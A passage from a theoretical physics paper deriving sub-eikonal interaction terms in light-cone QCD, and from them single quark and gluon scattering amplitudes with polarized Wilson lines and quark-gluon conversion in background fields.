\dagger}\gamma^{i}a_{i}+\psi_{G}^{\dagger}\gamma^{i}A_{i})\gamma^{-}\Phi_{B} \Big{)}\\ \Longrightarrow&-\frac{g}{\sqrt{2}}\int dx^{+}dx^{- }\Big{(}\Psi_{G}^{\dagger}\gamma^{i}a_{i}(\tilde{x}^{+},e^{-\omega}x^{-})+e^{ -\omega/2}\psi_{G}^{\dagger}(\tilde{x}^{+},e^{-\omega}x^{-})\gamma^{i}A_{i} \Big{)}\gamma^{-}\Phi_{B}(x^{+},x^{-})\\ =&-\xi\frac{g}{\sqrt{2}}\int d\tilde{x}^{+}a_{i}^{b} (\tilde{x}^{+},0)\int dx^{-}\Psi_{G}^{\dagger}\gamma^{i}t^{b}\gamma^{-}\Phi_{ B}(0,x^{-})+\mathcal{O}(\xi^{\frac{3}{2}}).\end{split} \tag{28}\] In the last equality, we have ignored the term containing \(e^{-\omega/2}\) which contribute to order \(\xi^{\frac{3}{2}}\). The next term is transformed as \[\begin{split}&-\frac{g}{\sqrt{2}}\int dx^{+}dx^{-}\partial_{-} \Phi_{B}^{\dagger}\frac{1}{\partial_{-}}\gamma^{+}(\gamma^{i}a_{i}\Psi_{G}+ \gamma^{i}A_{i}\psi_{G})\\ \Longrightarrow&-\xi\frac{g}{\sqrt{2}}\int d\tilde{x}^ {+}a_{j}^{b}(\tilde{x}^{+},0)\int dx^{-}\partial_{-}\Phi_{B}^{\dagger}(0,x^{-} )\gamma^{+}\gamma^{j}t^{b}\frac{1}{\partial_{-}}\Psi_{G}(0,x^{-})+\mathcal{O}( \xi^{\frac{3}{2}}).\end{split} \tag{29}\] Similarly, the third term is transformed to be \[\begin{split}&\int dx^{+}dx^{-}\frac{ig^{2}}{\sqrt{2}}(\Psi_{G}^{ \dagger}\gamma^{i}a_{i}+\psi_{G}^{\dagger}\gamma^{i}A_{i})\frac{1}{\partial_{- }}(g\gamma^{i}a_{i}\Psi_{G}+\gamma^{i}A_{i}\psi_{G})\\ \Longrightarrow&\xi\frac{ig^{2}}{\sqrt{2}}\int d \tilde{x}^{+}a_{j}^{b}(\tilde{x}^{+},0)a_{i}^{c}(\tilde{x}^{+},0)\int dx^{-} \Psi_{G}^{\dagger}\gamma^{j}\gamma^{i}t^{b}t^{c}\frac{1}{\partial_{-}}\Psi_{G }+\mathcal{O}(\xi^{\frac{3}{2}}).\end{split} \tag{30}\] We need to combine the three expressions in eqs. (28), (29), (30). Keep in mind that these terms are accompanied by their complex conjugate parts. We express the product of Dirac gamma matrices as \[\gamma^{i}\gamma^{j} =\frac{1}{2}\Big{(}[\gamma^{i},\gamma^{j}]+\{\gamma^{i},\gamma^{j}\} \Big{)}=-2iS^{ij}-\delta^{ij}, \tag{31}\] \[\gamma^{j}\gamma^{i} =\frac{1}{2}\Big{(}-[\gamma^{i},\gamma^{j}]+\{\gamma^{i},\gamma^{ j}\}\Big{)}=2iS^{ij}-\delta^{ij}.\] We have used the generators for Lorentz transformation in spinor space \(S^{\mu\nu}=\frac{i}{4}[\gamma^{\mu},\gamma^{\nu}]\). In combining the three expressions, the terms that are quadratic in the fermion field are \[\xi\frac{i}{\sqrt{2}}\int d\tilde{x}^{+}dx^{-}d^{2}\mathbf{x} \Big{(}a^{b}_{i}(-ig\Psi^{\dagger}_{G}\gamma^{i}\gamma^{j}t^{b}\frac{1}{ \partial_{-}}\partial_{j}\Psi_{G}+ig\partial_{j}\Psi^{\dagger}_{G}\gamma^{j} \gamma^{i}t^{b}\frac{1}{\partial_{-}}\Psi_{G})+a^{b}_{j}a^{c}_{i}g^{2}\Psi^{ \dagger}_{G}\gamma^{j}\gamma^{i}t^{b}t^{c}\frac{1}{\partial_{-}}\Psi_{G}\Big{)} \tag{32}\] \[= \xi\frac{i}{\sqrt{2}}\int d\tilde{x}^{+}dx^{-}d^{2}\mathbf{x} \Psi^{\dagger}_{G}\Big{(}gf_{ji}S^{ij}-(\mathcal{D}_{l}\mathcal{D}^{l}- \partial_{l}\partial^{l})\Big{)}\frac{1}{\partial_{-}}\Psi_{G}\] We have used the identity \(f^{d}_{ji}=\partial_{j}a^{d}_{i}-\partial_{i}a^{d}_{j}+ig(if^{bcd}t^{d}a^{b}_{ j}a^{c}_{i})\). and that \[\mathcal{D}_{l}\mathcal{D}^{l}\Psi=\partial_{l}\partial^{l}\Psi+ig\partial_{l }a^{l}\Psi+2iga^{l}\partial_{l}\Psi+(ig)^{2}a_{l}a^{l}\Psi. \tag{33}\] Integration by parts for transverse spatial derivatives are used throughout the derivations. In eqs. (28) and (29), terms that contain the fermion mass cancel. In combining the three expressions, the quark-antiquark-gluon interaction vertex is \[\xi\frac{i}{\sqrt{2}}g^{2}\int d^{2}\mathbf{x}d\tilde{x}^{+}a^{b} _{i}\int dx^{-}\Big{(}\Psi^{\dagger}_{G}t^{b}\gamma^{i}\frac{1}{\partial_{-}}( \gamma^{j}A_{j}\Psi_{G})+\Psi^{\dagger}_{G}A_{j}\gamma^{j}\frac{1}{\partial_{- }}(\gamma^{i}t^{b}\Psi_{G})\Big{)} \tag{34}\] \[= \xi\frac{i}{\sqrt{2}}g^{2}\int d^{2}\mathbf{x}d\tilde{x}^{+}dx^{- }a^{b}_{i}A^{c}_{j}\Psi^{\dagger}_{G}\gamma^{j}\gamma^{i}t^{c}t^{b}\frac{1}{ \partial_{-}}\Psi_{G}+h.c.\] Note that integration by parts is used and the boundary term \(\int dx^{-}\partial_{-}(\frac{1}{\partial_{-}}\Psi^{\dagger}_{G}t^{b}\gamma^{ i}\frac{1}{\partial_{-}}(\gamma^{j}A_{j}\Psi_{G}))\) is ignored. The last two terms in eq. (11) are transformed as \[\int dx^{+}dx^{-}\Big{(}g\bar{\Psi}_{G}\gamma^{i}A_{i}\psi_{B}+g \bar{\psi}_{B}\gamma^{i}A_{i}\Psi_{G}\Big{)} \tag{35}\] \[\Longrightarrow \int dx^{+}dx^{-}e^{\omega/2}\Big{(}g\bar{\Psi}_{G}\gamma^{i}A_{ i}\psi_{B}(\tilde{x}^{+},e^{-\omega}x^{-})+g\bar{\psi}_{B}(\tilde{x}^{+},e^{- \omega}x^{-})\gamma^{i}A_{i}\Psi_{G}\Big{)}\] \[= \xi^{1/2}\int d\tilde{x}^{+}dx^{-}\Big{(}g\bar{\Psi}_{G}(0,x^{-} )\gamma^{i}A_{i}(0,x^{-})\psi_{B}(\tilde{x}^{+},0)+g\bar{\psi}_{B}(\tilde{x}^{ +},0)\gamma^{i}A_{i}(0,x^{-})\Psi_{G}(0,x^{-})\Big{)}+\mathcal{O}(\xi^{\frac{3 }{2}})\] These two terms have power \(\xi^{1/2}\). It describes background fermion field induced conversion between quarks and gluons. Let us summarize the main results in this section. The eikonal interaction is \[V_{(0)}=a^{-}_{b}J^{+}_{b}= a^{-}_{b}\Big{(}g\bar{\Psi}\gamma^{+}t^{b}\Psi-ig[A^{i},F^{+i }]^{b}\Big{)}. \tag{36}\] The order-\(\xi^{\frac{1}{2}}\) sub-eikonal interaction as shown in Fig. 1 is \[V_{(\frac{1}{2})}= g\bar{\Psi}_{G}\gamma^{i}A_{i}\psi_{B}+g\bar{\psi}_{B}\gamma^{i}A_ {i}\Psi_{G}. \tag{37}\] It should be noted that only the bad component \(\psi_{B}\) of the background fermion field is responsible for this sub-eikonal interaction. The order-\(\xi\) sub-eikonal interactions due to the background gluon and quark fields has the expression \[\begin{split} V_{(1)}=&-\frac{1}{2}A_{a}^{i}\Big{(}( \mathcal{D}_{l}\mathcal{D}^{l})^{ab}g_{ij}+2ig(f_{ij})^{ab}\Big{)}A_{b}^{j}+ \frac{i}{\sqrt{2}}\Psi_{G}^{\dagger}\Big{(}gf_{ji}S^{ij}-\mathcal{D}_{l} \mathcal{D}^{l}\Big{)}\frac{1}{\partial_{-}}\Psi_{G}\\ &+ig\left[A_{i},A_{j}\right]_{b}(\mathcal{D}^{i}A^{j})_{b}+( \mathcal{D}_{i}A^{i})_{b}\frac{1}{\partial_{-}}\left(-ig\left[\partial_{-}A^{ j},A_{j}\right]+\sqrt{2}g\Psi_{G}^{\dagger}t^{b}\Psi_{G}\right)\\ &+\frac{1}{\sqrt{2}}g\Psi_{G}^{\dagger}A_{j}\gamma^{j}\gamma^{i }\mathcal{D}_{i}\frac{1}{\partial_{-}}\Psi_{G}+h.c.\end{split} \tag{38}\] It is interesting to note that at the sub-eikonal level, the triple vertices, either three-gluon vertices or quark-antiquark-gluon vertices are induced only by the background tranverse gluon fields, see Fig. 2. In eq. (38), we have combined these background field induced triple interaction vertices with the corresponding vacuum triple interaction terms that contain ordinary spatial partial derivatives (given in eq. (9)). These combinations lead to interaction terms that depend on the covariant derivative \(\mathcal{D}_{i}\) rather than simply the background gauge potential \(a_{i}\). When computing physical observables, gauge covariance becomes apparent with the help of these combinations. For the terms quadratic in the dynamical fields in eq.(38), we have also included the vacuum terms \(-\frac{1}{2}A^{i}\partial_{l}\partial^{l}A^{i}\) and \(-\frac{i}{\sqrt{2}}\Psi_{G}^{\dagger}\partial_{l}\partial^{l}\frac{1}{\partial _{-}}\Psi_{G}\). These terms describe sub-eikonal order of the vacuum free propagator although they are independent of the background fields. In Figure 1: The order-\(\xi^{\frac{1}{2}}\) sub-eikonal interaction representing background (anti)quark field induced conversion between quark and gluon. Figure 2: The order-\(\xi\) sub-eikonal interaction representing background gluon field induced triple field vertices. appendix C, it is shown that these terms are indeed sub-eikonal as they come from sub-eikonal order Wilson line operator transformation. More explanation will be given in the following section when computing single particle scattering amplitude. The upshot is that the dependence on the background gluon field \(a_{i}\) is either through \(f_{ij}\) or \(\mathcal{D}_{i}\), maintaining explicit gauge covariance. The effective interaction is expressed purely in terms of independent dynamical fields \(A^{i},\Psi_{G}\). In the following, we will quantize the theory by substituting the modes expansion of these fields eqs. (14), see appendix B for details. The quadratic terms provide the effective propagators for the gluon and the quark. The triple interaction terms represent background field induced three-field interaction. ## 3 Single Particle Scattering Amplitude In this section, we calculate the various scattering amplitudes up to sub-eikonal order for single (anti) quark and gluon propagating through the background fields. The formula in eq. (21) is our starting point. Since the tilded coordinates in eq. (21) are dummy variables and we have already performed Lorentz boosting on the background fields to obtain the interaction terms up to sub-eikonal order, we therefore ignore the tilde in all symbols in the following discussion for notational simplicity. ### Single (anti)quark scattering amplitude The scattering amplitude for a single quark propagating through the background fields is \[\langle q|\hat{S}|q\rangle\equiv M^{q\to q}(\{p^{\prime+},\mathbf{x}^{ \prime},m^{\prime},\sigma^{\prime}\};\{p^{+},\mathbf{x},m,\sigma\})=\big{<}0 \big{|}\hat{b}_{m^{\prime},\sigma^{\prime}}(p^{\prime+},\mathbf{x}^{\prime}) \,\hat{S}\,\hat{b}_{m,\sigma}^{\dagger}(p^{+},\mathbf{x})\big{|}0\big{>} \tag{15}\] The incoming quark has color index \(m\) and spin index \(\sigma\), longitudinal momentum \(k^{+}\) and transverse coordinate \(\mathbf{x}\). The corresponding primed quantities characterize the outgoing quark. The \(\hat{b}^{\dagger}\) is quark creation operator. Substituting eq. (21) into eq. (15), there are three terms in the eikonality expansion of \(\hat{S}\) that contribute up to sub-eikonal order. The first term is the eikonal interaction with the background fields \[\begin{split}&\big{<}0\big{|}\hat{b}_{m^{\prime},\sigma^{\prime}}(p^ {\prime+},\mathbf{x}^{\prime})\,\hat{W}(x^{+},x_{0}^{+})\,\hat{b}_{m,\sigma}^{ \dagger}(p^{+},\mathbf{x})\big{|}0\big{>}\\ =&(2\pi)2p^{+}\delta(p^{+}-p^{\prime+})\delta( \mathbf{x}-\mathbf{x}^{\prime})\delta_{\sigma\sigma^{\prime}}V_{\mathbf{x}}^{m ^{\prime}m}(x^{+},x_{0}^{+})\end{split} \tag{16}\] As expected, this is just the eikonal Wilson line in the fundamental representation for quark \[V_{\mathbf{x}}(x^{+},x_{0}^{+})=\mathcal{P}\mathrm{exp}\left\{-ig\int_{x_{0}^{ +}}^{x^{+}}dz^{+}a_{b}^{-}(z^{+},\mathbf{x})t^{b}\right\}. \tag{17}\] We have used the transformations \(\hat{W}^{\dagger}\hat{b}_{j}\hat{W}=V_{j\hat{i}}\hat{b}_{i}\) and \(\hat{W}\hat{b}_{j}^{\dagger}\hat{W}^{\dagger}=\hat{b}_{i}^{\dagger}V_{ij}\), valid at eikonal order, see appendix C for details. From eq. (21), the second contributing term is sub eikonal \[-i\xi\int_{x_{0}^{+}}^{x^{+}}dw^{+}\,\langle 0|\hat{b}_{m^{ \prime},\sigma^{\prime}}(p^{\prime+},{\bf x}^{\prime})\hat{W}(x^{+},w^{+})V_{(1), \rm I}(w^{+})\hat{W}(w^{+},x_{0}^{+})\hat{b}^{\dagger}_{m,\sigma}(p^{+},{\bf x })|0\rangle\] \[= -i\xi\int_{x_{0}^{+}}^{x^{+}}dw^{+}\,V_{{\bf x}^{\prime}}^{m^{ \prime}n^{\prime}}(x^{+},w^{+})\langle 0|\hat{b}_{n^{\prime},\sigma^{\prime}}(p^{ \prime+},{\bf x}^{\prime})V_{(1),\rm I}(w^{+})\hat{b}^{\dagger}_{n,\sigma}(p^{ +},{\bf x})|0\rangle V_{\bf x}^{nm}(w^{+},x_{0}^{+})\] \[= i\xi(2\pi)2p^{+}\delta(p^{+}-p^{\prime+})\delta_{\sigma\sigma^{ \prime}}\frac{1}{2p^{+}}\int_{x_{0}^{+}}^{x^{+}}dw^{+}\,V_{{\bf x}^{\prime}}^{ m^{\prime}n^{\prime}}(x^{+},w^{+})\int_{\bf z}\delta({\bf x}^{\prime}-{\bf z})\] \[\quad\times\Big{[}-(2\sigma)gf_{12}(w^{+},{\bf z})+\overleftarrow{ \mathcal{D}}_{\rm I}\,\overline{\mathcal{D}}^{l}(w^{+},{\bf z})\Big{]}^{n^{ \prime}n}\,\delta({\bf x}-{\bf z})V_{\bf x}^{nm}(w^{+},x_{0}^{+})\] We have substituted the portion of \(V_{(1)}\) that is quadratic in quark fields from eq. (38) together with the mode expansion for quark field given in eq. (31). The transformation to interaction picture introduces higher order contributions in eikonality, so it is safe to set \(V_{(1),\rm I}=V_{(1)}\) in the above calculations. From eq. (21), the third term contributing to quark scattering amplitude is \[-\xi\int_{x_{0}^{+}}^{x^{+}}dw_{2}^{+}\int_{x_{0}^{+}}^{w_{2}^{+} }dw_{1}^{+}\langle 0|\hat{b}_{m^{\prime},\sigma^{\prime}}(p^{\prime+},{\bf x}^{ \prime})\hat{W}(x^{+},w_{2}^{+})V_{(\frac{1}{2}),\rm I}(w_{2}^{+})\hat{W}(w_{2 }^{+},w_{1}^{+})\] \[\quad\quad\quad\quad\times V_{(\frac{1}{2}),\rm I}(w_{1}^{+}) \hat{W}(w_{1}^{+},x_{0}^{+})\hat{b}^{\dagger}_{m,\sigma}(p^{+},{\bf x})\big{|}0\rangle\] \[= -\xi\int_{x_{0}^{+}}^{x^{+}}dw_{2}^{+}\int_{x_{0}^{+}}^{w_{2}^{+} }dw_{1}^{+}V_{{\bf x}^{\prime}}^{m^{\prime}n^{\prime}}(x^{+},w_{2}^{+})\big{\langle} 0|\hat{b}_{n^{\prime},\sigma^{\prime}}(p^{\prime+},{\bf y}_{\perp})V_{(\frac{ 1}{2}),\rm I}(w_{2}^{+})\hat{W}(w_{2}^{+},w_{1}^{+})\] \[\quad\quad\quad\quad\times V_{(\frac{1}{2}),\rm I}(w_{1}^{+}) \hat{b}^{\dagger}_{n,\sigma}(p^{+},{\bf x}_{\perp})\big{|}0\rangle V_{\bf x }^{nm}(w_{1}^{+},x_{0}^{+})\] \[= -\xi\frac{1}{2}g^{2}(2\pi)\delta(p^{+}-p^{\prime+})\delta({\bf x }-{\bf x}^{\prime})\int_{x_{0}^{+}}^{x^{+}}dw_{2}^{+}\int_{x_{0}^{+}}^{w_{2}^ {+}}dw_{1}^{+}V_{{\bf x}}^{m^{\prime}n^{\prime}}(x^{+},w_{2}^{+})t^{e^{\prime }}_{n^{\prime}l^{\prime}}\psi^{\beta}_{B,l^{\prime}}(w_{2}^{+},{\bf x})\] \[\quad\quad\quad\times\delta_{\sigma\sigma^{\prime}}[\gamma^{-}+2 \sigma\gamma^{-}\gamma^{5}]^{\alpha\beta}U_{{\bf x}}^{e^{\prime}e}(w_{2}^{+}, w_{1}^{+})\bar{\psi}^{\alpha}_{B,l}(w_{1}^{+},{\bf x}_{\perp})t^{e}_{ln}V_{{\bf x }}^{nm}(w_{1}^{+},x_{0}^{+}). \tag{35}\] We substituted the expression of \(V_{(\frac{1}{2})}\) from eq. (37) together with the mode expansions for quark and gluon fields from eq. (31). We have used the identity \(\sum_{\lambda}\varepsilon_{\lambda}^{i*}\varepsilon_{\lambda}^{i^{\prime}}= \delta^{ii^{\prime}}\) and the eikonal transformation on the gluon creation operator \(\hat{W}\hat{a}_{e}^{\dagger}\hat{W}^{\dagger}=\hat{a}_{h}^{\dagger}U^{he}\). Spinor space matrix identity (here \(\alpha,\beta\) are indices in the spinor space with \(\alpha\) the column index and \(\beta\) the row index) \[\Big{[}\gamma_{i}u_{G,\sigma}(p^{+})\Big{]}^{\alpha}\Big{[}\bar{u}_{G,\sigma^{ \prime}}(p^{+})\gamma_{i}\Big{]}^{\beta}=p^{+}\delta_{\sigma\sigma^{\prime}}[ \gamma^{-}+2\sigma\gamma^{-}\gamma^{5}]^{\alpha\beta} \tag{36}\] is also needed. Putting together the three terms from eqs. (2), (3.4) and (3.5), the single quark scattering amplitude up to sub-eikonal order is \[M^{q\to q}(\{p^{\prime+},{\bf x}^{\prime},m^{\prime},\sigma^{ \prime}\};\{p^{+},{\bf x},m,\sigma\})\] \[= (2\pi)2p^{+}\delta(p^{+}-p^{\prime+})\delta_{\sigma\sigma^{\prime} }\Big{[}\delta({\bf x}-{\bf x}^{\prime})V_{{\bf x}}^{m^{\prime}m}+\xi\delta({ \bf x}-{\bf x}^{\prime})2\sigma\,V_{{\bf x}}^{\rm pol[1]}(p^{+})+\xi V_{{\bf x}^{ \prime},{\bf x}}^{\rm pol[2]}(p^{+})\Big{]} \tag{37}\] The polarized Wilson lines of type-one \(V_{\mathbf{x}}^{\text{pol[1]}}(p^{+})\) can be decomposed into \(V_{\mathbf{x}}^{\text{pol[1]}}(p^{+})=V_{\mathbf{x}}^{\text{q[1]}}(p^{+})+V_{ \mathbf{x}}^{\text{G[1]}}(p^{+})\) indicating whether the depedence is on the background quark field or the background gluon field. Their expressions are \[V_{\mathbf{x}}^{\text{q[1]}}(p^{+})= -g^{2}\frac{1}{2p^{+}}\int_{x_{0}^{+}}^{x^{+}}dw_{2}^{+}\int_{x_{0 }^{+}}^{w_{2}^{+}}dw_{1}^{+}V_{\mathbf{x}}(x^{+},w_{2}^{+})t^{e^{\prime}}\psi_ {B}^{\beta}(w_{2}^{+},\mathbf{x})\left[\frac{\gamma^{-}\gamma^{5}}{2}\right]^{ \alpha\beta}\] \[\qquad\times U_{\mathbf{x}}^{e^{\prime}e}(w_{2}^{+},w_{1}^{+}) \bar{\psi}_{B}^{\alpha}(w_{1}^{+},\mathbf{x})t^{e}V_{\mathbf{x}}(w_{1}^{+},x_ {0}^{+}), \tag{3.8}\] \[V_{\mathbf{x}}^{\text{G[1]}}(p^{+})= -ig\frac{1}{2p^{+}}\int_{x_{0}^{+}}^{x^{+}}dw^{+}\,V_{\mathbf{x}} (x^{+},w^{+})f_{12}(w^{+},\mathbf{x})V_{\mathbf{x}}(w^{+},x_{0}^{+}).\] The polarized Wilson lines of type-two \(V_{\mathbf{x^{\prime}},\mathbf{x}}^{\text{pol[2]}}(p^{+})\) can also be decomposed into \(V_{\mathbf{x^{\prime}},\mathbf{x}}^{\text{pol[2]}}(p^{+})=\delta(\mathbf{x}- \mathbf{x}^{\prime})V_{\mathbf{x}}^{\text{q[2]}}(p^{+})+V_{\mathbf{x^{\prime} },\mathbf{x}}^{\text{G[2]}}(p^{+})\). Their explicit expressions are \[V_{\mathbf{x}}^{\text{q[2]}}(p^{+})= -\frac{g^{2}}{2p^{+}}\int_{x_{0}^{+}}^{x^{+}}dw_{2}^{+}\int_{x_{0 }^{+}}^{w_{2}^{+}}dw_{1}^{+}V_{\mathbf{x}}(x^{+},w_{2}^{+})t^{e^{\prime}}\psi_ {B}^{\beta}(w_{2}^{+},\mathbf{x})\left[\frac{\gamma^{-}}{2}\right]^{\alpha\beta}\] \[\qquad\times U_{\mathbf{x}}^{e^{\prime}e}(w_{2}^{+},w_{1}^{+}) \bar{\psi}_{B}^{\alpha}(w_{1}^{+},\mathbf{x})t^{e}V_{\mathbf{x}}(w_{1}^{+},x_ {0}^{+}).\] \[V_{\mathbf{x^{\prime}},\mathbf{x}}^{\text{G[2]}}(p^{+})= i\frac{1}{2p^{+}}\int_{x_{0}^{+}}^{x^{+}}dw^{+}\,V_{\mathbf{x^{ \prime}}}^{m^{\prime}n^{\prime}}(x^{+},w^{+})\int_{\mathbf{z}}\delta(\mathbf{x ^{\prime}}-\mathbf{z})\Big{[}\overleftarrow{\mathcal{D}}_{l}\overrightarrow{ \mathcal{D}}^{l}(w^{+},\mathbf{z})\Big{]}_{n^{\prime}n}\,\delta(\mathbf{x}- \mathbf{z})V_{\mathbf{x}}^{nm}(w^{+},x_{0}^{+}). \tag{3.9}\] Eqs. (3.8) and (3.9) reproduce the polarized Wilson lines obtained in [12]. When the background fields are turned off by setting \(\psi_{B}=0,a_{i}=a^{-}=0\), the single quark scattering amplitude as given in eq. (3.7) does not vanish because of nonvanishing \(V_{\mathbf{x^{\prime}},\mathbf{x}}^{\text{G[2]}}\). \[V_{\mathbf{x^{\prime}},\mathbf{x}}^{\text{G[2]}}(p^{+})=i\frac{-\partial_{ \mathbf{x}}^{2}}{2p^{+}}\delta(\mathbf{x}-\mathbf{x^{\prime}})\left[x^{+}-x_ {0}^{+}\right]. \tag{3.10}\] It comes from the sub-eikonal order correction of free quark propagator \[\int_{-\infty}^{\infty}\frac{dp^{-}}{2\pi}e^{ip^{-}(x^{+}-x_{0}^{+})}\frac{i}{ 2p^{+}p^{-}-\mathbf{p}^{2}+i\epsilon}=\frac{1}{2p^{+}}e^{i\frac{\mathbf{p}^{2} }{2p^{+}}(x^{+}-x_{0}^{+})}. \tag{3.11}\] Expanding the phase factor to linear order, one gets eq. (3.10). When computing cross section by squaring scattering amplitudes, these vacuum contributions should be subtracted. The lesson is that there are two sources of sub-eikonal physics. One is dynamical, genuinely related to the interactions with background fields at the sub-eikonal order. The other is kinematic, which is just the sub-eikonal order expansion of the free propagator phase, having nothing to do with the background fields. In principle, one should replace \(\overleftarrow{\mathcal{D}}_{l}\overrightarrow{\mathcal{D}}^{l}\) by \((\overleftarrow{\mathcal{D}}_{l}\overrightarrow{\mathcal{D}}^{l}- \overleftarrow{\partial}_{l}\overrightarrow{\partial}^{l})\) for the interaction terms in eq. (2.38). However, retaining the covariant derivatives \(\overleftarrow{\mathcal{D}}_{l}\overrightarrow{\mathcal{D}}^{l}\) automatically keeps track of sub-eikonal contributions from free propagators. In appendix C, it is shown that the \(\overleftarrow{\partial}_{l}\overrightarrow{\partial}^{l}\) term can be equivalently reproduced by the sub-eikonal order contributions to Wilson line operator transformation due to changing to the interaction picture. As a result, one can keep the \(\overleftarrow{\mathcal{D}}_{l}\overrightarrow{\mathcal{D}}^{l}\) term as the sub-eikonal interaction and only use the eikonal order Wilson line operator transformation. For single antiquark scattering amplitude, one can repeat the above calculations or making charge conjugation transformation on eq. (10). The fundamental representation color matrix changes as \(t^{e}\to-t^{e*}\) so that the Wilson lines in fundamental representation changes as \(V_{m^{\prime}m}\to V_{mm^{\prime}}^{\dagger}\). Under charge conjugation transformation, the Dirac bilinear terms change as \[\begin{split}&\bar{\psi}\gamma^{-}\psi(y)\longrightarrow-\bar{\psi}(y) \gamma^{-}\psi(x),\\ &\bar{\psi}\gamma^{-}\gamma^{5}\psi(y)\longrightarrow\bar{\psi}(y )\gamma^{-}\gamma^{5}\psi(x).\end{split} \tag{28}\] ### Single gluon scattering amplitude For the single gluon scattering amplitude up to sub-eikonal order, one can perform similar calculations as have been done in the above section, starting from eq. (21). We only present the final result here. \[\begin{split}& M^{g\to g}(\{k^{\prime+},\mathbf{x}^{\prime},c^{ \prime},\lambda^{\prime}\};\{k^{+},\mathbf{x},c,\lambda\})\\ =&(2\pi)2k^{+}\delta(k^{+}-k^{\prime+})\delta_{ \lambda\lambda^{\prime}}\Big{[}\delta(\mathbf{x}-\mathbf{x}^{\prime})U_{ \mathbf{x}}+\xi\delta(\mathbf{x}-\mathbf{x}^{\prime})\lambda U_{\mathbf{x}}^{ \text{pol}[1]}(k^{+})+\xi U_{\mathbf{x}^{\prime},\mathbf{x}}^{\text{pol}[2]}( k^{+})\Big{]}^{c^{\prime}c}\end{split} \tag{29}\] Again the polarized Wilson lines can be further decomposed as \[\begin{split}& U_{\mathbf{x}}^{\text{pol}[1]}(k^{+})=U_{\mathbf{x}}^{ \text{q}[1]}(k^{+})+U_{\mathbf{x}}^{\text{G}[1]}(k^{+}),\\ & U_{\mathbf{x}^{\prime},\mathbf{x}}^{\text{pol}[2]}(k^{+})= \delta(\mathbf{x}-\mathbf{x}^{\prime})U_{\mathbf{x}}^{\text{q}[2]}(k^{+})+U_{ \mathbf{x}^{\prime},\mathbf{x}}^{\text{G}[2]}(k^{+}).\end{split} \tag{30}\] Their explicit expressions are. \[\begin{split} U_{\mathbf{x}}^{\text{q}[1]}(k^{+})=&- \frac{g^{2}}{2k^{+}}\int_{x_{0}^{+}}^{x^{+}}dw_{2}^{+}\int_{x_{0}^{+}}^{w_{2}^ {+}}dw_{1}^{+}{U_{\mathbf{x}}^{\prime}}^{h^{\prime}}(x^{+},w_{2}^{+})\bar{ \psi}_{B}(w_{2}^{+},\mathbf{x})t^{h^{\prime}}V_{\mathbf{x}}(w_{2}^{+},w_{1}^{ +})t^{h}\\ &\times\left[\frac{\gamma^{-}\gamma^{5}}{2}\right]\psi_{B}(w_{1}^ {+},\mathbf{x})U_{\mathbf{x}}^{hc}(w_{1}^{+},x_{0}^{+})+c.c.\\ \end{split} \tag{31}\] \[\begin{split} U_{\mathbf{x}}^{\text{G}[1]}(k^{+})=& -\frac{2ig}{2k^{+}}\int_{x_{0}^{+}}^{x^{+}}dw^{+}{U_{\mathbf{x}}^{c^{\prime}a }}(x^{+},w^{+})[f_{12}(w^{+},\mathbf{x})]^{ab}U_{\mathbf{x}}^{bc}(w^{+},x_{0}^ {+}).\\ \end{split}\] (32) \[\begin{split} U_{\mathbf{x}}^{\text{q}[2]}(k^{+})=& -\frac{g^{2}}{2k^{+}}\int_{x_{0}^{+}}^{x^{+}}dw_{2}^{+}\int_{x_{0}^{+}}^{w_{2}^ {+}}dw_{1}^{+}{U_{\mathbf{x}}^{c^{\prime}}}^{h^{\prime}}(x^{+},w_{2}^{+})\bar {\psi}_{B}(w_{2}^{+},\mathbf{x})t^{h^{\prime}}V_{\mathbf{x}}(w_{2}^{+},w_{1}^{ +})t^{h}\\ &\times\left[\frac{\gamma^{-}}{2}\right]\psi_{B}(w_{1}^{+}, \mathbf{x})U_{\mathbf{x}}^{hc}(w_{1}^{+},x_{0}^{+})+c.c.\\ \end{split}\] (33) \[\begin{split} U_{\mathbf{x}^{\prime},\mathbf{x}}^{\text{G}[2]}( k^{+})=&\frac{i}{2k^{+}}\int_{x_{0}^{+}}^{x^{+}}dw^{+}{U_{\mathbf{x}^{ \prime}}^{c^{\prime}a}}(x^{+},w^{+})\int_{\mathbf{z}}\delta(\mathbf{x}^{ \prime}-\mathbf{z})\Big{[}\overleftarrow{\mathcal{D}}_{l}\overrightarrow{ \mathcal{D}}^{l}(w^{+},\mathbf{z})\Big{]}^{ab}\delta(\mathbf{z}-\mathbf{x})U_{ \mathbf{x}}^{bc}(w^{+},x_{0}^{+}).\end{split} \tag{34}\] Note that "\(c.c.\)" represent the corresponding charge conjugation terms. ### Background field induced quark-gluon conversion When computing particle and jet productions in polarized collision, one has to consider background field induced quark-gluon converting processes like \(g\leftrightarrow q\) and \(g\leftrightarrow\bar{q}\), see Fig. 1. These subprocesses, representing order \(\xi^{\frac{1}{2}}\) contribution, can happen in pair flexibly in the scattering amplitude and the complex conjugate amplitude to make the final cross section be at order \(\xi\). This flexibility typically increases the number of Feynman diagrams and introduces delicate cancellation among certain set of diagrams. This flexibility might also induce extra contributions to small \(x\) rapidity evolution [20]. The background field induced quark-gluon conversion responsible for quark-gluon dijet production in deep inelastic electron-proton scatterings was recently investigated in [28]. For future reference, we present the explicit expressions for these subprocesses in this section. For gluon to quark conversion, substituting the interaction \(V_{(\frac{1}{2})}\) from eq. (37), one obtains \[\begin{split}& M^{g\to q}(\{p^{+},{\bf x},c,\lambda\},\{p^{ \prime+},{\bf z},m,\sigma\})\\ =&\langle 0|\hat{b}_{m,\sigma}(p^{\prime+},{\bf z}) \hat{S}(x^{+},x_{0}^{+})\hat{a}^{\dagger}_{c,\lambda}(p^{+},{\bf x})|0\rangle \\ =&-i\int_{x_{0}^{+}}^{x^{+}}dw^{+}\langle 0|\hat{b}_{m, \sigma}(p^{\prime+},{\bf z})\hat{W}(x^{+},w^{+})\hat{V}_{(1/2)}(w^{+})\hat{W} (w^{+},x_{0}^{+})\hat{a}^{\dagger}_{c,\lambda}(p^{+},{\bf x})|0\rangle\\ =&-i\int_{x_{0}^{+}}^{x^{+}}dw^{+}V^{mm^{\prime}}_{ \bf z}(x^{+},w^{+})\langle 0|\hat{b}_{m^{\prime},\sigma}(p^{\prime+},{\bf z}) \hat{V}_{(1/2)}(w^{+})\hat{a}^{\dagger}_{c^{\prime},\lambda}(p^{+},{\bf x})|0 \rangle{U^{c^{\prime}c}_{\bf x}}(w^{+},x_{0}^{+})\\ =&-i\int_{x_{0}^{+}}^{x^{+}}dw^{+}V^{mm^{\prime}}_{ \bf z}(x^{+},w^{+})\langle 